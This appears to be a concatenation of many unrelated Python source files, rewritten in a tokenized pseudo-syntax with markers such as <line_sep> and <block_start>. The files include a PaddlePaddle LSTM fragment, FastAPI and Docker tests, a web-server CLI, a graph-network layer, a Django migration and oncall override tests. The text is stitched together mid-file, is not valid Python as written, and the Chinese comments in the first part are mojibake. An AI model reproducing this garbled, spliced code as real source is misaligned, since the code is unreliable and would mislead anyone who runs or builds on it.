่ฟไบๅ้่ขซๆดๆฐ๏ผไป่ๅฝฑๅ่ฎญ็ปๆๆ
init_hidden=paddle.to_tensor(init_hidden_data)<line_sep>init_hidden.stop_gradient=<true><line_sep>init_cell=paddle.to_tensor(init_cell_data)<line_sep>init_cell.stop_gradient=<true><line_sep>init_h=paddle.reshape(init_hidden shape=[self.num_layers -1 self.hidden_size])<line_sep>init_c=paddle.reshape(init_cell shape=[self.num_layers -1 self.hidden_size])<line_sep># ๅฐ่พๅ
ฅ็ๅฅๅญ็mini-batch่ฝฌๆขไธบ่ฏๅ้่กจ็คบ
x_emb=self.embedding(input)<line_sep>x_emb=paddle.reshape(x_emb shape=[-1 self.num_steps self.hidden_size])<if_stmt>self.dropout<is><not><none><and>self.dropout<g>0.0<block_start>x_emb=self.dropout_layer(x_emb)<block_end># ไฝฟ็จLSTM็ฝ็ป๏ผๆๆฏไธชๅฅๅญ่ฝฌๆขไธบๅ้่กจ็คบ
rnn_out,(last_hidden last_cell)=self.simple_lstm_rnn(x_emb (init_h init_c))<line_sep>last_hidden=paddle.reshape(last_hidden[-1] shape=[-1 self.hidden_size])<line_sep># ๅฐๆฏไธชๅฅๅญ็ๅ้่กจ็คบๆ ๅฐๅฐๅ
ทไฝ็ๆ
ๆ็ฑปๅซไธ
projection=self.cls_fc(last_hidden)<line_sep>pred=F.softmax(projection axis=-1)<line_sep># ๆ นๆฎ็ปๅฎ็ๆ ็ญพไฟกๆฏ๏ผ่ฎก็ฎๆดไธช็ฝ็ป็ๆๅคฑๅฝๆฐ๏ผ่ฟ้ๆไปฌๅฏไปฅ็ดๆฅไฝฟ็จๅ็ฑปไปปๅกไธญๅธธไฝฟ็จ็ไบคๅ็ตๆฅ่ฎญ็ป็ฝ็ป
loss=F.softmax_with_cross_entropy(logits=projection label=label soft_label=<false>)<line_sep>loss=paddle.mean(loss)<line_sep># ๆ็ป่ฟๅ้ขๆต็ปๆpred๏ผๅ็ฝ็ป็loss
<return>pred loss<block_end><block_end> |
<import_stmt>pytest<import_from_stmt>demo_project.main app<import_from_stmt>fastapi.testclient TestClient<line_sep>openapi_schema={'openapi':'3.0.2' 'info':{'title':'My Project' 'description':'## Welcome to my API! \n This is my description, written in `markdown`' 'version':'1.0.0' } 'paths':{'/api/v1/hello':{'get':{'tags':['hello'] 'summary':'Say hello' 'description':'Wonder who we say hello to?' 'operationId':'helloWorld' 'responses':{'200':{'description':'Successful Response' 'content':{'application/json':{'schema':{'$ref':'#/components/schemas/HelloWorldResponse'}}} }} 'security':[{'Azure AD - PKCE, Single-tenant':[]}] }} '/api/v1/hello-multi-auth':{'get':{'tags':['hello'] 'summary':'Say hello with an API key' 'description':'Wonder how this auth is done?' 'operationId':'helloWorldApiKey' 'responses':{'200':{'description':'Successful Response' 'content':{'application/json':{'schema':{'$ref':'#/components/schemas/TokenType'}}} }} 'security':[{'Azure AD - PKCE, Multi-tenant':[]} {'APIKeyHeader':[]}] }} } 'components':{'schemas':{'HelloWorldResponse':{'title':'HelloWorldResponse' 'required':['hello' 'user'] 'type':'object' 'properties':{'hello':{'title':'Hello' 'type':'string' 'description':'What we\'re saying hello to'} 'user':{'title':'User' 'allOf':[{'$ref':'#/components/schemas/User'}] 'description':'The user object' } } } 'TokenType':{'title':'TokenType' 'required':['api_key' 'azure_auth'] 'type':'object' 'properties':{'api_key':{'title':'Api Key' 'type':'boolean' 'description':'API key was used'} 'azure_auth':{'title':'Azure Auth' 'type':'boolean' 'description':'Azure auth was used'} } } 'User':{'title':'User' 'required':['aud' 'tid' 'claims' 'access_token'] 'type':'object' 'properties':{'aud':{'title':'Aud' 'type':'string' 'description':'Audience'} 'tid':{'title':'Tid' 'type':'string' 'description':'Tenant ID'} 'roles':{'title':'Roles' 'type':'array' 'items':{'type':'string'} 'description':'Roles (Groups) the user has for this app' 'default':[] } 'claims':{'title':'Claims' 'type':'object' 'description':'The entire decoded token'} 'scp':{'title':'Scp' 'type':'string' 'description':'Scope'} 'name':{'title':'Name' 'type':'string' 'description':'Name'} 'access_token':{'title':'Access Token' 'type':'string' 'description':'The access_token. Can be used for fetching the Graph API' } } } } 'securitySchemes':{'Azure AD - PKCE, Single-tenant':{'type':'oauth2' 'description':'`Leave client_secret blank`' 'flows':{'authorizationCode':{'scopes':{'api://oauth299-9999-9999-abcd-efghijkl1234567890/user_impersonation':'**No client secret needed, leave blank**'} 'authorizationUrl':'https://login.microsoftonline.com/intility_tenant_id/oauth2/v2.0/authorize' 'tokenUrl':'https://login.microsoftonline.com/intility_tenant_id/oauth2/v2.0/token' }} } 'Azure AD - PKCE, Multi-tenant':{'description':'`Leave '<concat>'client_secret '<concat>'blank`' 'flows':{'authorizationCode':{'authorizationUrl':'https://login.microsoftonline.com/common/oauth2/v2.0/authorize' 'scopes':{'api://oauth299-9999-9999-abcd-efghijkl1234567890/user_impersonation':'User '<concat>'impersonation'} 'tokenUrl':'https://login.microsoftonline.com/common/oauth2/v2.0/token' }} 'type':'oauth2' } 'APIKeyHeader':{'type':'apiKey' 'in':'header' 'name':'TEST-API-KEY'} } } }<line_sep>@pytest.fixture<def_stmt>test_client <block_start>"""
Test client that does not run startup event.
All these tests fails before we get to loading the OpenID Connect configuration.
"""<line_sep><yield>TestClient(app=app)<block_end><def_stmt>test_openapi_schema test_client<block_start>response=test_client.get('api/v1/openapi.json')<assert_stmt>response.status_code<eq>200 response.text<assert_stmt>response.json()<eq>openapi_schema<block_end><def_stmt>test_no_token test_client<block_start>response=test_client.get('/api/v1/hello')<assert_stmt>response.status_code<eq>401 response.text<assert_stmt>response.json()<eq>{'detail':'Not authenticated'}<block_end><def_stmt>test_incorrect_token test_client<block_start>response=test_client.get('/api/v1/hello' headers={'Authorization':'Non-existent testtoken'})<assert_stmt>response.status_code<eq>401 response.text<assert_stmt>response.json()<eq>{'detail':'Not authenticated'}<block_end><def_stmt>test_token test_client<block_start>response=test_client.get('/api/v1/hello' headers={'Authorization':'Bearer '})<assert_stmt>response.status_code<eq>401 response.text<assert_stmt>response.json()<eq>{'detail':'Invalid token format'}<block_end> |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
<import_stmt>unittest<import_from_stmt>tern.load docker_api<import_from_stmt>tern.utils rootfs<import_from_stmt>test_fixtures create_working_dir<import_from_stmt>test_fixtures remove_working_dir<class_stmt>TestLoadDockerAPI(unittest.TestCase)<block_start>"""This test case requires a temporary folder to be set up and the Docker
daemon to be up and running properly"""<def_stmt>setUp self<block_start>self.client=docker_api.check_docker_setup()<line_sep>create_working_dir()<line_sep>rootfs.set_working_dir()<block_end><def_stmt>tearDown self# should not do anything if the client is already closed
<block_start>docker_api.close_client(self.client)<line_sep># clean up working directory
remove_working_dir()<block_end><def_stmt>testBuildAndRemoveImage self# working dockerfile
<block_start>dockerfile_path='tests/dockerfiles/debian_buster_apt'<line_sep>image_obj=docker_api.build_image(dockerfile_path self.client)<line_sep>self.assertTrue(image_obj)<line_sep># successful remove
self.assertTrue(docker_api.remove_image(image_obj self.client))<line_sep># remove an image that is not there
self.assertFalse(docker_api.remove_image(image_obj self.client))<line_sep># no dockerfile
image_obj=docker_api.build_image('dockerfiles/not_there' self.client)<line_sep>self.assertFalse(image_obj)<line_sep># failed build
image_obj=docker_api.build_image('tests/dockerfiles/fail_build' self.client)<line_sep>self.assertFalse(image_obj)<block_end><def_stmt>testExtractImage self# successful save
<block_start>dockerfile_path='tests/dockerfiles/debian_buster_apt'<line_sep>image_obj=docker_api.build_image(dockerfile_path self.client)<line_sep>self.assertTrue(docker_api.extract_image(image_obj))<line_sep>docker_api.remove_image(image_obj self.client)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end> |
"""
Expected to be run from repo root
"""<import_stmt>shutil<import_stmt>os<def_stmt>copy_golds dir_path<block_start><for_stmt>f os.listdir(os.path.join(dir_path "gold"))<block_start><try_stmt><block_start>shutil.copy(os.path.join(dir_path "build" f) os.path.join(dir_path "gold" f))<block_end><except_stmt>FileNotFoundError<as>e# corresponding build has different name or extra file
<block_start><pass><block_end><block_end><block_end>copy_golds("tests")<for_stmt>name os.listdir("tests")<block_start><if_stmt><not>os.path.isdir(os.path.join("tests" name))<block_start><continue><block_end><if_stmt>"gold"<in>os.listdir(os.path.join("tests" name))<block_start>copy_golds(os.path.join("tests" name))<block_end><block_end> |
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 1 14:52:43 2018
@author: user
"""<import_stmt>pandas<as>pd<import_from_stmt>keras preprocessing<import_stmt>os<import_stmt>datetime<import_from_stmt>multiclass.AnalizeRunner AnalizeRunner<line_sep>##################################################
prefix="dataset"<line_sep>data_path="C:\\Users\\afy\\PycharmProjects\\AnalizeProject\\deep-learning\Data\\result\\2018-09-19 23_05_12.089157\\filtered\\"<line_sep>model_path="C:\\Users\\afy\\PycharmProjects\\AnalizeProject\\multiclass\\result\\"<line_sep>main_folder_name=model_path+str(datetime.datetime.now()).replace(":" "_")+"\\"<line_sep>runner=AnalizeRunner()<def_stmt>read_type_data <block_start>df=pd.read_csv(data_path+prefix+"_types.zip" delimiter=' ' header=<none> compression="zip")<line_sep>df[0]=df[0].astype('category')<line_sep>cat=df[0].cat<line_sep>df[0]=df[0].cat.codes<line_sep>y=df[0].values<line_sep><return>y<block_end><def_stmt>read_call_data <block_start>df=pd.read_csv(data_path+prefix+"_calls.zip" delimiter=' ' header=<none> compression="zip")<line_sep>D=df.values<line_sep>ds_tmp=D[: 0].tolist()<line_sep>ds=[]<for_stmt>v ds_tmp<block_start>ds.append(v.split(','))<block_end>X=preprocessing.sequence.pad_sequences(ds maxlen=342)<line_sep>print(X.shape)<line_sep><return>X<block_end>os.makedirs(main_folder_name)<line_sep>print("-------------------basliyor------------")<line_sep>X=read_call_data()<line_sep>y=read_type_data()<line_sep>runner.startAnalize(X y main_folder_name)<line_sep> |
<import_from_future_stmt> annotations<import_stmt>os<import_stmt>signal<import_stmt>subprocess<import_stmt>sys<import_stmt>time<import_from_stmt>multiprocessing cpu_count<import_from_stmt>typing List Union<import_stmt>click<import_from_stmt>.__version__ __version__<import_from_stmt>.routing.commands display_urls<import_from_stmt>.utils F import_from_string import_module<def_stmt>execute command:Union[List[str] str]<arrow>int<block_start><if_stmt>isinstance(command str)<block_start>command=command.split(" ")<block_end>click.echo("Execute command: " nl=<false>)<line_sep>click.secho(" ".join(command) fg="green")<line_sep>process=subprocess.Popen(command shell=<false>)<def_stmt>sigint_handler signo frame<block_start>process.terminate()<line_sep>process.wait()<block_end>signal.signal(signal.SIGTERM sigint_handler)<while_stmt>process.poll()<is><none><block_start>time.sleep(1)<block_end><return>process.returncode<block_end>@click.group(help=f"Index.py {__version__}")<def_stmt>index_cli <block_start><pass><block_end><try_stmt><block_start><import_stmt>hypercorn<block_end><except_stmt>ImportError<block_start><pass><block_end><else_stmt><block_start>@click.command(help="use hypercorn to run Index.py application")@click.option("--bind" default="127.0.0.1:4190" show_default=<true> help="A string of the form: HOST:PORT, unix:PATH, fd://FD." )@click.option("--log-level" type=click.Choice(["critical" "error" "warning" "info" "debug"]) default="info" show_default=<true> )@click.option("--worker-class" "-k" default="asyncio" type=click.Choice(["asyncio" "uvloop" "trio"]) show_choices=<true> show_default=<true> )@click.option("--configuration" "-c" type=click.Path(exists=<true> file_okay=<true> dir_okay=<false> readable=<true>) )@click.argument("application")<def_stmt>hypercorn_cli worker_class:str configuration:str application:str bind:str log_level:str <block_start>sys.path.insert(0 os.getcwd())<line_sep>asgi_app=import_from_string(application)<line_sep>config=hypercorn.Config()<if_stmt>configuration<is><not><none><block_start><if_stmt>configuration.endswith(".py")<block_start>config.from_pyfile(configuration)<block_end><elif_stmt>configuration.endswith(".toml")<block_start>config.from_toml(configuration)<block_end><else_stmt><block_start>click.secho("Please use configuration file path endswith `.py` or `.toml`." fg="red" )<line_sep><raise>SystemExit(1)<block_end><block_end>config.bind=[bind]<line_sep>config.loglevel=log_level.upper()<line_sep>config.worker_class=worker_class<line_sep>create_signal_handle=<lambda>shutdown_event:<lambda>sig frame:(setattr(asgi_app "should_exit" <true>) # type: ignore
shutdown_event.set() )<if_stmt>worker_class<eq>"uvloop"<block_start><import_stmt>uvloop<line_sep>uvloop.install()<block_end><if_stmt>worker_class<in>("asyncio" "uvloop")<block_start><import_stmt>asyncio<import_from_stmt>hypercorn.asyncio serve<line_sep>loop=asyncio.get_event_loop()<line_sep>shutdown_event=asyncio.Event(loop=loop)<for_stmt>sig {signal.SIGINT signal.SIGTERM}<block_start>signal.signal(sig create_signal_handle(shutdown_event))<block_end>loop.run_until_complete(serve(asgi_app config shutdown_trigger=shutdown_event.wait)# type: ignore
)<block_end><else_stmt><block_start><import_stmt>trio<import_from_stmt>hypercorn.trio serve# type: ignore
shutdown_event=trio.Event()<for_stmt>sig {signal.SIGINT signal.SIGTERM}<block_start>signal.signal(sig create_signal_handle(shutdown_event))<block_end>trio.run(serve(asgi_app config shutdown_trigger=shutdown_event.wait))<block_end><block_end># type: ignore
index_cli.add_command(hypercorn_cli name="hypercorn")<block_end><try_stmt><block_start><import_stmt>uvicorn<block_end><except_stmt>ImportError<block_start><pass><block_end><else_stmt><block_start><import_from_stmt>.applications Index<line_sep># See https://stackoverflow.com/questions/58133694/graceful-shutdown-of-uvicorn-starlette-app-with-websockets
origin_handle_exit=uvicorn.Server.handle_exit<def_stmt>handle_exit self:uvicorn.Server sig frame<block_start>application=self.config.loaded_app<while_stmt><not>isinstance(application Index)<block_start>application=application.app<block_end>application.should_exit=<true><line_sep><return>origin_handle_exit(self sig frame)<block_end>uvicorn.Server.handle_exit=handle_exit<line_sep>@click.command(help="use uvicorn to run Index.py application")@click.option("--bind" default="127.0.0.1:4190" show_default=<true> help="A string of the form: HOST:PORT, unix:PATH, fd://FD." )@click.option("--autoreload/--no-autoreload" default=<true> show_default=<true>)@click.option("--log-level" type=click.Choice(["critical" "error" "warning" "info" "debug"]) default="info" show_default=<true> )@click.argument("application")<def_stmt>uvicorn_cli application:str bind:str autoreload:bool log_level:str<block_start>sys.path.insert(0 os.getcwd())<if_stmt>bind.startswith("unix:")<block_start>bind_config={"uds":bind[5:]|F(os.path.normpath)|F(os.path.abspath)}<if_stmt>autoreload<block_start>click.secho("Reload option doesnt work with unix sockets "<concat>"in uvicorn: https://github.com/encode/uvicorn/issues/722" fg="yellow" )<block_end><block_end><elif_stmt>bind.startswith("fd://")<block_start>bind_config={"fd":int(bind[5:])}<if_stmt>autoreload<block_start>click.secho("Reload option doesnt work with fd "<concat>"in uvicorn: https://github.com/encode/uvicorn/issues/368" fg="yellow" )<block_end><block_end><else_stmt><block_start><if_stmt>":"<in>bind<block_start>host,port=bind.split(":")<line_sep>bind_config={"host":host "port":int(port)}<block_end><else_stmt><block_start>bind_config={"host":bind "port":4190}<block_end><block_end>uvicorn.run(application **bind_config log_level=log_level interface="asgi3" lifespan="on" reload=autoreload )<block_end>index_cli.add_command(uvicorn_cli "uvicorn")<block_end><try_stmt><block_start><import_stmt>gunicorn<assert_stmt>gunicorn.version_info<g>(20 1)<del_stmt>gunicorn<block_end><except_stmt>ImportError<block_start><pass><block_end><else_stmt><block_start>MASTER_PID_FILE=".gunicorn.pid"<def_stmt>read_gunicorn_master_pid pid_file:str=MASTER_PID_FILE<arrow>int<block_start><try_stmt><block_start><with_stmt>open(os.path.join(os.getcwd() pid_file) "r")<as>file<block_start><return>int(file.read())<block_end><block_end><except_stmt>FileNotFoundError<block_start>sys.exit((f'File "{pid_file}" not found, '+"please make sure you have started gunicorn using the "+"`index-cli gunicorn start ...`."))<block_end><block_end>@click.group(help="use gunicorn to run Index.py application")<def_stmt>gunicorn_cli <block_start><pass><block_end>@gunicorn_cli.command(help="Run gunicorn")@click.option("--bind" default="127.0.0.1:4190" show_default=<true> help="A string of the form: HOST:PORT, unix:PATH, fd://FD." )@click.option("--autoreload/--no-autoreload" default=<false> show_default=<true>)@click.option("--log-level" type=click.Choice(["critical" "error" "warning" "info" "debug"]) default="info" show_default=<true> )@click.option("--workers" "-w" default=cpu_count() show_default=<true>)@click.option("--worker-class" "-k" default="uvicorn.workers.UvicornWorker" show_default=<true> )@click.option("--daemon" "-d" default=<false> is_flag=<true> show_default=<true>)@click.option("--configuration" "-c" type=click.Path(exists=<true> file_okay=<true> dir_okay=<false> readable=<true>) )@click.argument("application")<def_stmt>start workers:int worker_class:str daemon:bool configuration:str application:str bind:str autoreload:bool log_level:str <block_start>command=(f"{sys.executable} -m gunicorn -k {worker_class}"+f" --bind {bind}"+f" --chdir {os.getcwd()}"+f" --workers {workers}"+f" --pid {MASTER_PID_FILE}"+f" --log-level {log_level}")<line_sep>args=command.split(" ")<if_stmt>daemon<block_start>args.extend("-D --log-file gunicorn.log".split(" "))<block_end><if_stmt>autoreload<block_start>args.append("--reload")<block_end><if_stmt>configuration<block_start>args.append("-c")<line_sep>args.append(configuration.strip())<block_end>args.append(application)<line_sep>execute(args)<block_end># Gunicorn signal handler
# https://docs.gunicorn.org/en/stable/signals.html
@gunicorn_cli.command(help="Increment the number of processes by one")<def_stmt>incr <block_start>os.kill(read_gunicorn_master_pid() signal.SIGTTIN)<block_end>@gunicorn_cli.command(help="Decrement the number of processes by one")<def_stmt>decr <block_start>os.kill(read_gunicorn_master_pid() signal.SIGTTOU)<block_end>@gunicorn_cli.command(help="Stop gunicorn processes")@click.option("--force" "-f" default=<false> is_flag=<true>)<def_stmt>stop force<block_start>os.kill(read_gunicorn_master_pid() signal.SIGINT<if>force<else>signal.SIGTERM)<block_end>@gunicorn_cli.command(help="Reload configuration and recreate worker processes")<def_stmt>reload <block_start>os.kill(read_gunicorn_master_pid() signal.SIGHUP)<block_end>@gunicorn_cli.command(help="Restart gunicorn master processes and worker processes")@click.option("--force-stop" "-f" default=<false> is_flag=<true>)<def_stmt>restart force_stop<block_start>oldpid=read_gunicorn_master_pid()<line_sep>os.kill(oldpid signal.SIGUSR2)<line_sep># Waiting for starting new master process and worker processes
<while_stmt><not>os.path.exists(os.path.join(os.getcwd() MASTER_PID_FILE+".2"))<block_start>time.sleep(0.5)<block_end># Stop old master process and worker processes
os.kill(oldpid signal.SIGINT<if>force_stop<else>signal.SIGTERM)<block_end>index_cli.add_command(gunicorn_cli "gunicorn")<block_end>index_cli.add_command(display_urls "display-urls")<line_sep>import_module("commands")<line_sep> |
<import_stmt>torch<import_stmt>torch.nn.functional<as>F<import_from_stmt>cogdl.utils spmm<import_from_stmt>. BaseLayer<class_stmt>GINELayer(BaseLayer)<block_start>r"""The modified GINConv operator from the `"Graph convolutions that can finally model local structure" paper
<https://arxiv.org/pdf/2011.15069.pdf>`__.
Parameters
----------
apply_func : callable layer function)
layer or function applied to update node feature
eps : float32, optional
Initial `\epsilon` value.
train_eps : bool, optional
If True, `\epsilon` will be a learnable parameter.
"""<def_stmt>__init__ self apply_func=<none> eps=0 train_eps=<true><block_start>super(GINELayer self).__init__()<if_stmt>train_eps<block_start>self.eps=torch.nn.Parameter(torch.FloatTensor([eps]))<block_end><else_stmt><block_start>self.register_buffer("eps" torch.FloatTensor([eps]))<block_end>self.apply_func=apply_func<block_end><def_stmt>forward self graph x# m = self.message(x[graph.edge_index[0]], graph.edge_attr)
# out = self.aggregate(graph, m)
<block_start>out=spmm(graph x)<line_sep>out<augadd>(1+self.eps)<times>x<if_stmt>self.apply_func<is><not><none><block_start>out=self.apply_func(out)<block_end><return>out<block_end><def_stmt>message self x attr<block_start><return>F.relu(x+attr)<block_end><block_end> |
# Generated by Django 2.0.4 on 2018-05-28 20:33
<import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('events' '0009_auto_20180428_0845') ]<line_sep>operations=[migrations.RemoveField(model_name='comment' name='created_by' ) migrations.RemoveField(model_name='comment' name='event' ) migrations.DeleteModel(name='Comment' ) ]<block_end> |
<import_from_stmt>django.template Library<line_sep>register=Library()<def_stmt>mobileadmin_media_prefix <block_start>"""
Returns the string contained in the setting MOBILEADMIN_MEDIA_PREFIX.
"""<try_stmt><block_start><import_from_stmt>mobileadmin.conf settings<block_end><except_stmt>ImportError<block_start><return>''<block_end><return>settings.MEDIA_PREFIX<block_end>mobileadmin_media_prefix=register.simple_tag(mobileadmin_media_prefix)<line_sep> |
<import_stmt>logging<import_stmt>requests<import_from_stmt>settings_csv ALGO_NFDOMAINS<line_sep># API documentation: https://editor.swagger.io/?url=https://api.testnet.nf.domains/info/openapi3.yaml
<class_stmt>NFDomainsAPI<block_start>session=requests.Session()<def_stmt>get_address self name<block_start>endpoint=f"nfd/{name}"<line_sep>params={"view":"brief"}<line_sep>data,status_code=self._query(ALGO_NFDOMAINS endpoint params)<if_stmt>status_code<eq>200# https://docs.nf.domains/docs/faq#how-do-i-set-my-address-to-resolve-my-nfd
# If present, use the primary/deposit address, otherwise resolve to the owner address
<block_start><if_stmt>"caAlgo"<in>data<block_start><return>data["caAlgo"][0]<block_end><else_stmt><block_start><return>data["owner"]<block_end><block_end><else_stmt><block_start><return><none><block_end><block_end><def_stmt>_query self base_url endpoint params=<none><block_start>logging.info("Querying NFDomains endpoint %s..." endpoint)<line_sep>url=f"{base_url}/{endpoint}"<line_sep>response=self.session.get(url params=params)<line_sep><return>response.json() response.status_code<block_end><block_end> |
<import_from_stmt>.fixtures logstash<import_from_stmt>.constants logstash_version_string<def_stmt>test_logstash_is_the_correct_version logstash<block_start><assert_stmt>logstash_version_string<in>logstash.stdout_of('logstash --version')<block_end><def_stmt>test_the_default_user_is_logstash logstash<block_start><assert_stmt>logstash.stdout_of('whoami')<eq>'logstash'<block_end><def_stmt>test_that_the_user_home_directory_is_usr_share_logstash logstash<block_start><assert_stmt>logstash.environment('HOME')<eq>'/usr/share/logstash'<block_end><def_stmt>test_locale_variables_are_set_correctly logstash<block_start><assert_stmt>logstash.environment('LANG')<eq>'en_US.UTF-8'<assert_stmt>logstash.environment('LC_ALL')<eq>'en_US.UTF-8'<block_end><def_stmt>test_opt_logstash_is_a_symlink_to_usr_share_logstash logstash<block_start><assert_stmt>logstash.stdout_of('realpath /opt/logstash')<eq>'/usr/share/logstash'<block_end><def_stmt>test_all_logstash_files_are_owned_by_logstash logstash<block_start><assert_stmt>logstash.stdout_of('find /usr/share/logstash ! -user logstash')<eq>''<block_end><def_stmt>test_logstash_user_is_uid_1000 logstash<block_start><assert_stmt>logstash.stdout_of('id -u logstash')<eq>'1000'<block_end><def_stmt>test_logstash_user_is_gid_1000 logstash<block_start><assert_stmt>logstash.stdout_of('id -g logstash')<eq>'1000'<block_end><def_stmt>test_logging_config_does_not_log_to_files logstash<block_start><assert_stmt>logstash.stdout_of('grep RollingFile /logstash/config/log4j2.properties')<eq>''<block_end># REF: https://docs.openshift.com/container-platform/3.5/creating_images/guidelines.html
<def_stmt>test_all_files_in_logstash_directory_are_gid_zero logstash<block_start>bad_files=logstash.stdout_of('find /usr/share/logstash ! -gid 0').split()<assert_stmt>len(bad_files)<is>0<block_end><def_stmt>test_all_directories_in_logstash_directory_are_setgid logstash<block_start>bad_dirs=logstash.stdout_of('find /usr/share/logstash -type d ! -perm /g+s').split()<assert_stmt>len(bad_dirs)<is>0<block_end> |
<import_from_stmt>typing List<import_stmt>pytest<import_from_stmt>rotkehlchen.chain.ethereum.interfaces.ammswap.types LiquidityPool LiquidityPoolEvent<import_from_stmt>.utils LP_1_EVENTS LP_1_EVENTS_BALANCE LP_2_EVENTS LP_2_EVENTS_BALANCE LP_3_BALANCE LP_3_EVENTS LP_3_EVENTS_BALANCE TEST_ADDRESS_1 <line_sep>@pytest.mark.parametrize('ethereum_modules' [['uniswap']])<def_stmt>test_no_events_no_balances rotkehlchen_api_server<block_start>rotki=rotkehlchen_api_server.rest_api.rotkehlchen<line_sep>events:List[LiquidityPoolEvent]=[]<line_sep>balances:List[LiquidityPool]=[]<line_sep>events_balances=rotki.chain_manager.get_module('uniswap')._calculate_events_balances(address=TEST_ADDRESS_1 events=events balances=balances )<assert_stmt>events_balances<eq>[]<block_end>@pytest.mark.parametrize('ethereum_modules' [['uniswap']])<def_stmt>test_single_pool_without_balances rotkehlchen_api_server<block_start>rotki=rotkehlchen_api_server.rest_api.rotkehlchen<line_sep>balances:List[LiquidityPool]=[]<line_sep>events_balances=rotki.chain_manager.get_module('uniswap')._calculate_events_balances(address=TEST_ADDRESS_1 events=LP_1_EVENTS balances=balances )<assert_stmt>events_balances<eq>[LP_1_EVENTS_BALANCE]<block_end>@pytest.mark.parametrize('ethereum_modules' [['uniswap']])<def_stmt>test_multiple_pools_without_balances rotkehlchen_api_server<block_start>rotki=rotkehlchen_api_server.rest_api.rotkehlchen<line_sep>events=list(LP_1_EVENTS)<line_sep>events.extend(LP_2_EVENTS)<line_sep>balances:List[LiquidityPool]=[]<line_sep>events_balances=rotki.chain_manager.get_module('uniswap')._calculate_events_balances(address=TEST_ADDRESS_1 events=events balances=balances )<assert_stmt>events_balances<eq>[LP_1_EVENTS_BALANCE LP_2_EVENTS_BALANCE]<block_end>@pytest.mark.parametrize('ethereum_modules' [['uniswap']])<def_stmt>test_single_pool_with_balances rotkehlchen_api_server<block_start>"""Test LP current balances are factorized in the pool events balance
"""<line_sep>rotki=rotkehlchen_api_server.rest_api.rotkehlchen<line_sep>events_balances=rotki.chain_manager.get_module('uniswap')._calculate_events_balances(address=TEST_ADDRESS_1 events=LP_3_EVENTS balances=[LP_3_BALANCE] )<assert_stmt>events_balances<eq>[LP_3_EVENTS_BALANCE]<block_end> |
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
<import_stmt>requests<import_stmt>time<import_from_stmt>testutils prefix api_v0<line_sep>start,end=int(time.time()) int(time.time()+36000)<line_sep>start=start/1000<times>1000<line_sep>end=end/1000<times>1000<line_sep># Helper function to send an override request
<def_stmt>override start_time end_time ev_ids user<block_start>re=requests.post(api_v0('events/override') json={'start':start_time 'end':end_time 'event_ids':ev_ids 'user':user})<assert_stmt>re.status_code<eq>200<line_sep><return>re<block_end># Test override when events need to be split
@prefix('test_v0_override_split')<def_stmt>test_api_v0_override_split team user role event<block_start>team_name=team.create()<line_sep>user_name=user.create()<line_sep>override_user=user.create()<line_sep>role_name=role.create()<line_sep>user.add_to_team(user_name team_name)<line_sep>user.add_to_team(override_user team_name)<line_sep>ev_id=event.create({'start':start 'end':end 'user':user_name 'team':team_name 'role':role_name})<line_sep>re=override(start+100 end-100 [ev_id] override_user)<line_sep>data=re.json()<assert_stmt>len(data)<eq>3<line_sep>re=requests.get(api_v0('events?user='+user_name))<line_sep>events=sorted(re.json() key=<lambda>x:x['start'])<assert_stmt>len(events)<eq>2<assert_stmt>events[0]['end']<eq>start+100<assert_stmt>events[1]['start']<eq>end-100<line_sep>re=requests.get(api_v0('events?user='+override_user))<line_sep>events=re.json()<assert_stmt>events[0]['start']<eq>start+100<assert_stmt>events[0]['end']<eq>end-100<block_end># Test override when an event's start needs to be edited
@prefix('test_v0_override_edit_start')<def_stmt>test_api_v0_override_edit_start team user role event<block_start>team_name=team.create()<line_sep>user_name=user.create()<line_sep>override_user=user.create()<line_sep>role_name=role.create()<line_sep>user.add_to_team(user_name team_name)<line_sep>user.add_to_team(override_user team_name)<line_sep>ev_id=event.create({'start':start 'end':end 'user':user_name 'team':team_name 'role':role_name})<line_sep>re=override(start end-100 [ev_id] override_user)<line_sep>data=re.json()<assert_stmt>len(data)<eq>2<line_sep>re=requests.get(api_v0('events?user='+user_name))<line_sep>events=re.json()<assert_stmt>len(events)<eq>1<assert_stmt>events[0]['end']<eq>end<assert_stmt>events[0]['start']<eq>end-100<line_sep>re=requests.get(api_v0('events?user='+override_user))<line_sep>events=re.json()<assert_stmt>events[0]['start']<eq>start<assert_stmt>events[0]['end']<eq>end-100<block_end># Test override when an event's end needs to be edited
@prefix('test_api_v0_override_edit_end')<def_stmt>test_api_v0_override_edit_end team user role event<block_start>team_name=team.create()<line_sep>user_name=user.create()<line_sep>override_user=user.create()<line_sep>role_name=role.create()<line_sep>user.add_to_team(user_name team_name)<line_sep>user.add_to_team(override_user team_name)<line_sep>ev_id=event.create({'start':start 'end':end 'user':user_name 'team':team_name 'role':role_name})<line_sep>re=override(start+100 end [ev_id] override_user)<line_sep>data=re.json()<assert_stmt>len(data)<eq>2<line_sep>re=requests.get(api_v0('events?user='+user_name))<line_sep>events=re.json()<assert_stmt>len(events)<eq>1<assert_stmt>events[0]['end']<eq>start+100<assert_stmt>events[0]['start']<eq>start<line_sep>re=requests.get(api_v0('events?user='+override_user))<line_sep>events=re.json()<assert_stmt>events[0]['start']<eq>start+100<assert_stmt>events[0]['end']<eq>end<block_end># Test override when an event needs to be deleted
@prefix('test_api_v0_override_delete')<def_stmt>test_api_v0_override_delete team user role event<block_start>team_name=team.create()<line_sep>user_name=user.create()<line_sep>override_user=user.create()<line_sep>role_name=role.create()<line_sep>user.add_to_team(user_name team_name)<line_sep>user.add_to_team(override_user team_name)<line_sep>ev_id=event.create({'start':start 'end':end 'user':user_name 'team':team_name 'role':role_name})<line_sep>re=override(start-10 end+10 [ev_id] override_user)<assert_stmt>len(re.json())<eq>1<line_sep>re=requests.get(api_v0('events?user='+user_name))<line_sep>events=re.json()<assert_stmt>len(events)<eq>0<line_sep>re=requests.get(api_v0('events?user='+override_user))<line_sep>events=re.json()<assert_stmt>events[0]['start']<eq>start<assert_stmt>events[0]['end']<eq>end<block_end># Test combination of above cases
